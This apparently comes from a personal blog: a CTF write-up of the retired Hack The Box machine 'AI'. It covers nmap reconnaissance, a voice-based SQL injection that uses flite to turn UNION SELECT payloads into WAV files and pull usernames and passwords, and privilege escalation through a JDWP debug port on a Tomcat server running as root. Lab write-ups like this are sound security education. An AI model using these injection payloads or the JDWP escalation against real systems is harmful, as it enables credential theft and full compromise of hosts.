Hey guys.AI from Hack The Box was retired today and here is my write up about it.
AI is a linux medium machine and the ip adress is 10.10.10.163.It is really fun machine.
For the user path it is about wav file access on web server,use sql injection to get the credential from database and loggind into ssh.
For priv Java Debug portoco Tomcat running as root and exploit it.So let’s get jump in.
As always we start with nmap to scan for open port and services.
root@ch4n:~# nmap -sC -sV 10.10.10.163
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-25 21:25 EST
Nmap scan report for 10.10.10.163
Host is up (0.25s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| 2048 6d:16:f4:32:eb:46:ca:37:04:d2:a5:aa:74:ed:ab:fc (RSA)
| 256 78:29:78:d9:f5:43:d1:cf:a0:03:55:b1:da:9e:51:b6 (ECDSA)
|_ 256 85:2e:7d:66:30:a6:6e:30:04:82:c1:ae:ba:a4:99:bd (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Hello AI!
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 103.42 seconds
In our nmap scan there are two open ports.SSH is running on port 22 and http is running on port 80.
Nothing was interesting on nmap let’s check the web page.
After playing around on web page found the ai.php.
It said drop you query using wav file.
So in here we need to upload wav file.
I wanna explain something about convertion of text to wav file in here.
At first I used an online tool https://www.text2speech.org/ but it is not work for the long sentence.
The AI can’t understand so I split the voice in audacity for the long sentence it is annoying to do.
So I look for the better tools called flite.
It mention about query in web page.I think about it may be voice sql injection.Actually I didn’t expect that but it was really fun.
So I test like
open single quote
Turn to wav file
flite -o open-single-quote.wav -t “open single quote” -voice rms
here we got the sql injection error.
Let’s pull the creds:-)
I used some commas and spaces to speak slowly.
root@ch4n:~/Desktop/htb/boxes/AI# flite -o user.wav -t “open single quote, union, select, username, from, users, comment, database” -voice rms
here we got the username as
Do the same thing for the password:-)
root@ch4n:~/Desktop/htb/boxes/AI# flite -o pass.wav -t “open single quote, union, select, password, from, users, comment, database” -voice rms
Here we got the password as
I just login to ssh and grab the user flag
I just run the pspy and found the java debug file is running
2019/11/10 17:52:03 CMD: UID=0 PID=14442 | /usr/bin/java -Djava.util.logging.config.file=/opt/apache-tomcat-9.0.27/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -agentlib:jdwp=transport=dt_socket,address=localhost:8000,server=y,suspend=n -Dignore.endorsed.dirs= -classpath /opt/apache-tomcat-9.0.27/bin/bootstrap.jar:/opt/apache-tomcat-9.0.27/bin/tomcat-juli.jar -Dcatalina.base=/opt/apache-tomcat-9.0.27 -Dcatalina.home=/opt/apache-tomcat-9.0.27 -Djava.io.tmpdir=/opt/apache-tomcat-9.0.27/temp org.apache.catalina.startup.Bootstrap start
2019/11/10 17:52:07 CMD: UID=1000 PID=14465 | sudo -u mrr3boot vi ./var/crash/_usr_bin_pkttyagent.4000000000.crash
2019/11/10 17:52:07 CMD: UID=4000000000 PID=14466 | vi ./var/crash/_usr_bin_pkttyagent.4000000000.crash
After googling about jdwp exploit,found the exploit and wonderful article
After reading the exploit
I run the exxploit and garb the root flag
That’s it guys.
Hope you enjoy my write up:-)
Don’t forget to check other write up on my blog.